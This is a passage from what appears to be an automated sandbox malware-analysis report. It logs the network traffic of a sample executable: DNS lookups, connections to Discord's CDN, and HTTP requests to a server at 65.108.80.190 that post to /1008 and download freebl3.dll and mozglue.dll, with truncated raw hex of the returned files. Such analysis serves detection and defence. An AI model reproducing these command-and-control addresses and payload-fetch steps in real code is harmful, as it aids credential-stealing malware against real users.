Oct 16, 2021 16:53:43.937560081 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.937580109 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.937637091 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.937947035 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:43.937959909 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.937971115 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.937995911 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:43.938009024 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:43.941081047 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:43.941096067 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.131135941 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.131166935 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.131194115 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.131243944 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.131282091 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135099888 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135145903 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135176897 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135246992 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135265112 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135337114 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135371923 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135381937 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135395050 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135478020 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135487080 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135502100 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135570049 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135580063 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135601044 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135611057 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135613918 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135691881 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135699034 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135710955 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135716915 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135720968 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135735035 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135742903 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135746002 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.135808945 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.135814905 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.136320114 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.136331081 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:44.136354923 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:44.143100977 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:45.151757956 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:45.309041023 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:49.799179077 CEST	49752	443	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:49.799211979 CEST	443	49752	162.159.130.233	192.168.2.7
Oct 16, 2021 16:53:58.125109911 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.125164032 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:58.126483917 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.164589882 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.164634943 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:58.222662926 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:58.222946882 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.228864908 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.228888988 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:58.229650974 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:58.274312019 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:58.980108976 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.027144909 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047574043 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047636986 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047678947 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047717094 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047748089 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047754049 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.047811031 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.047823906 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.047883987 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.048494101 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.049592972 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.049638033 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.049729109 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.049753904 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.049824953 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.050676107 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.051850080 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.051882982 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.051939964 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.051964045 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.052026987 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.063711882 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.064171076 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.064238071 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.064258099 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.065613031 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.065654993 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.065716028 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.065737963 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.065804958 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.066339970 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.067498922 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.067565918 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.067586899 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.068615913 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.068660975 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.068681955 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.068702936 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.068756104 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.069725037 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.070875883 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.070930958 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.070939064 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.070965052 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.071033001 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.071964979 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.073076963 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.073158979 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.073174000 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.074250937 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.074312925 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.074325085 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.074342012 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.074404001 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.075429916 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.076422930 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.076469898 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.076498032 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.076513052 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.076596022 CEST	443	49755	142.250.203.100	192.168.2.7
Oct 16, 2021 16:53:59.076622009 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.076657057 CEST	49755	443	192.168.2.7	142.250.203.100
Oct 16, 2021 16:53:59.485152960 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:59.485208035 CEST	49751	80	192.168.2.7	162.159.130.233
Oct 16, 2021 16:53:59.486282110 CEST	49755	443	192.168.2.7	142.250.203.100

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2021 16:53:22.427273035 CEST	58562	53	192.168.2.7	8.8.8.8
Oct 16, 2021 16:53:22.443048000 CEST	53	58562	8.8.8.8	192.168.2.7
Oct 16, 2021 16:53:36.693620920 CEST	60501	53	192.168.2.7	8.8.8.8
Oct 16, 2021 16:53:36.715358973 CEST	53	60501	8.8.8.8	192.168.2.7
Oct 16, 2021 16:53:58.078265905 CEST	51837	53	192.168.2.7	8.8.8.8
Oct 16, 2021 16:53:58.094129086 CEST	53	51837	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 16, 2021 16:53:22.427273035 CEST	192.168.2.7	8.8.8.8	0x12d4	Standard query (0)	mas.to	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.693620920 CEST	192.168.2.7	8.8.8.8	0xbe66	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:58.078265905 CEST	192.168.2.7	8.8.8.8	0xc111	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Oct 16, 2021 16:53:22.443048000 CEST	8.8.8.8	192.168.2.7	0x12d4	No error (0)	mas.to	88.99.75.82	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.715358973 CEST	8.8.8.8	192.168.2.7	0xbe66	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.715358973 CEST	8.8.8.8	192.168.2.7	0xbe66	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.715358973 CEST	8.8.8.8	192.168.2.7	0xbe66	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.715358973 CEST	8.8.8.8	192.168.2.7	0xbe66	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:36.715358973 CEST	8.8.8.8	192.168.2.7	0xbe66	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Oct 16, 2021 16:53:58.094129086 CEST	8.8.8.8	192.168.2.7	0xc111	No error (0)	www.google.com	142.250.203.100	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

mas.to

cdn.discordapp.com

www.google.com

65.108.80.190

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49736	88.99.75.82	443	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49752	162.159.130.233	443	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49755	142.250.203.100	443	C:\ProgramData\VKOTTYY7FG6Q1H0K.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49737	65.108.80.190	80	C:\Users\user\Desktop\MSQNZmmg2F.exe

Timestamp	kBytes transferred	Direction	Data
Oct 16, 2021 16:53:23.145035982 CEST	743	OUT	POST /1008 HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: 65.108.80.190 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Oct 16, 2021 16:53:23.230283022 CEST	773	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 8c b1 0a 83 30 10 86 9f c6 25 48 50 8b 4b 32 d6 4e 1d 2c d4 6e 5d ae 31 5a 31 21 21 b9 ab f5 ed 2b c9 58 0e fe ef 3b f8 ef ea b2 fe 9b a6 ad ca 4e 4f 40 06 65 d1 5d ee d7 a1 bf 15 4f c9 38 7e 51 30 3e c2 91 1b 18 a3 91 71 26 58 33 41 e2 0b d4 4a 3e a9 72 a3 4e e2 21 c6 cd 85 31 2d 40 f8 4e 32 3b 37 9b 5c 20 54 89 8f e1 9c 2f c3 ee f3 db 55 ef 07 65 5b 49 0c a4 a5 75 9f 45 47 61 29 2e 4a 58 7f 92 3f 78 84 d6 b9 ba 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 99e0%HPK2N,n]1Z1!!+X;NO@e]O8~Q0>q&X3AJ>rN!1-@N2;7\ T/Ue[IuEGa).JX?x0
Oct 16, 2021 16:53:23.234201908 CEST	774	OUT	GET /freebl3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:23.273890972 CEST	778	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:23 GMT Content-Type: application/x-msdos-program Content-Length: 334288 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "519d0-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:23 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$/AVAVAVVAV]@WAV1VAV]BWAV]DWAV]EWAV@WAVO@WAV@VAVOBWAVOEWAVOAWAVOVAVOCWAVRichAVPELb["!f)ps@pP@xP0T@8.textt `.rdata@@.data,H@.rsrcx@@@.relocP@B
Oct 16, 2021 16:53:23.273943901 CEST	780	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 3f 01 00 00 e8 23 c9 03 00 59 85 c0 75 0e 68 13 e0 ff ff e8 Data Ascii: h?#Yuh&Y3(UVt-jujuuuVzt(Y3^]U0SVW}EuGE9Esho}Y
Oct 16, 2021 16:53:23.273982048 CEST	781	IN	Data Raw: 41 ff 88 42 03 84 c9 75 1c 8a 4a 02 8d 41 ff 88 42 02 84 c9 75 0f 8a 4a 01 8d 41 ff 88 42 01 84 c9 75 02 fe 0a 5d c3 68 90 00 00 00 e8 ff c3 03 00 59 c3 55 8b ec 56 68 90 00 00 00 e8 ef c3 03 00 8b f0 59 85 f6 74 2a 6a 00 ff 75 18 ff 75 14 ff 75 Data Ascii: ABuJABuJABu]hYUVhYt*juuuuuVtjVWYY3^]US]3t9thY)9]shESuuPuM[]U}t!hjuO}tuHY]U
Oct 16, 2021 16:53:23.274069071 CEST	782	IN	Data Raw: 3c 73 8b 75 08 66 8b 5d f4 66 89 7d ec 66 c1 cf 05 66 2b 0c 46 66 2b 1c 56 8b 45 ec 83 e0 3f 66 89 4d f8 8b 55 f8 66 89 4d 12 66 8b 4d f0 66 2b 0c 46 66 89 4d f0 8b 75 f0 66 89 4d fe 66 89 5d f4 8b 4d f4 8b c1 f7 d0 66 c1 cb 03 23 c6 23 ca 66 2b Data Ascii: <suf]f}ff+Ff+VE?fMUfMfMf+FfMufMf]Mf##f+Ef+f+xV#Mf+#Ef+fUff+XT]#f+}#f+f+SR#fU#ff+uf+f+SPfM#f#f+Uf+f+KNfM}f##f
Oct 16, 2021 16:53:23.274120092 CEST	784	IN	Data Raw: d1 23 fb 66 8b 4d ec 23 c2 66 c1 c9 05 66 2b c8 89 55 f0 66 2b cf 8b c3 8b 7d 08 f7 d0 23 da 66 2b 4f 0e 0f b7 f1 66 8b 4d f4 23 c6 66 c1 c9 03 66 2b c8 89 75 ec 66 2b cb 66 2b 4f 0c 0f b7 f9 89 7d f4 66 8b 4d f8 8b c2 66 c1 c9 02 f7 d0 23 c7 66 Data Ascii: #fM#ff+Uf+}#f+OfM#ff+uf+f+O}fMf#f+#Uf+#f+JfM#ff+]f+f+J#fM#ff+UEf+f+HfM#f#f+}f+]f+KfM#ff+u#ff+f+K
Oct 16, 2021 16:53:23.274177074 CEST	785	IN	Data Raw: 55 f8 8b ca f7 d1 8b c2 23 4d fc 23 45 10 03 c8 8b 45 08 66 03 48 28 8b c2 66 03 ce 66 d1 c1 0f b7 f1 23 c6 89 75 f4 8b ce f7 d1 23 4d 10 03 c8 8b 45 08 66 03 48 2a 66 03 cf 66 c1 c1 02 0f b7 f9 8b cf 89 7d fc f7 d1 8b c7 23 ca 23 c6 03 c8 8b 45 Data Ascii: U#M#EEfH(ff#u#MEfH*ff}##EfH,f]fU##fK.fMfu##fK0fMf}##fK2fMfU##fK4fMfu##fK6fMf
Oct 16, 2021 16:53:23.274213076 CEST	787	IN	Data Raw: c1 02 0f b7 d1 8b ca 89 55 fc f7 d1 8b c2 23 ce 23 c7 03 c8 66 03 4b 7c 66 03 4d 10 66 c1 c1 03 0f b7 c1 8b c8 89 45 10 f7 d1 23 c2 23 cf 03 c8 66 03 4b 7e 66 03 ce 66 c1 c1 05 0f b7 c1 8b 4d 0c 89 45 f8 66 8b c7 5f 5e 66 89 01 66 8b c2 66 89 41 Data Ascii: U##fK\|fMfE##fK~ffMEf_^fffAfEfAfEfA[]UQQVuEMSW}XW+NUFfDfEfBfEffEfBfE1E1EEPPQ:MEUEfE
Oct 16, 2021 16:53:23.274301052 CEST	788	IN	Data Raw: 53 8b 5d 10 89 95 f4 fe ff ff 57 8b 7d 08 89 bd f8 fe ff ff 85 db 0f 84 a1 00 00 00 b8 00 01 00 00 3b d8 0f 83 94 00 00 00 85 ff 75 0a 68 05 e0 ff ff e9 8b 00 00 00 56 be 60 f2 03 10 6a 40 59 f3 a5 8d b5 fc fe ff ff 8b f8 3b d8 73 19 53 52 56 e8 Data Ascii: S]W};uhV`j@Y;sSRV+;wWRV2+8Guf3^hYYM_3[]USVuW}
Oct 16, 2021 16:53:23.274385929 CEST	789	IN	Data Raw: 0f b6 04 08 c1 e0 10 0b f0 8a 45 ff fe c7 0f b6 d7 8a 1c 0a 02 c3 88 45 ff 0f b6 c0 8a 0c 08 88 0c 3a 8b d7 8b 7d 1c 02 cb 83 ef 04 89 7d 1c 88 1c 10 0f b6 c1 8b 4d 14 0f b6 04 10 c1 e0 18 0b c6 8b f2 33 45 0c 8b 55 f8 89 01 83 c1 04 83 6d 18 01 Data Ascii: EE:}}M3EUmM}mE3_^[]Ujjj@u]Uhju"}tuY]UVuW}j@X;G}9r}FP
Oct 16, 2021 16:53:23.274445057 CEST	791	IN	Data Raw: 51 81 f7 d1 82 e6 ad 03 c6 89 85 cc fe ff ff 13 cf 33 85 1c ff ff ff 8b d9 89 8d c8 fe ff ff 33 9d 20 ff ff ff 8b d0 8b 4d 84 0f ac da 18 0f ac c3 18 8b 45 88 03 ca 13 c3 01 8d e0 fe ff ff 8b 8d f0 fe ff ff 13 c8 8b 85 e0 fe ff ff 33 c6 89 8d f0 Data Ascii: Q33 ME33x\|33EM$(3D3
Oct 16, 2021 16:53:23.313867092 CEST	793	IN	Data Raw: bd 80 fe ff ff 8b c8 0f ac d1 1f 0f ac c2 1f 8b 45 e0 89 8d 70 fe ff ff 8b 4d dc 03 cb 89 95 8c fe ff ff 8b 95 f4 fe ff ff 13 c7 03 d1 8b 8d d4 fe ff ff 8b f2 13 c8 89 95 f4 fe ff ff 33 b5 88 fe ff ff 8b d1 33 95 98 fe ff ff 8b 85 c8 fe ff ff 89 Data Ascii: EpM333M3E33M33
Oct 16, 2021 16:53:23.908029079 CEST	1133	OUT	GET /mozglue.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 65.108.80.190 Connection: Keep-Alive
Oct 16, 2021 16:53:23.947530031 CEST	1165	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 16 Oct 2021 14:53:23 GMT Content-Type: application/x-msdos-program Content-Length: 137168 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "217d0-57aa1f0b0df80" Expires: Sun, 17 Oct 2021 14:53:23 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 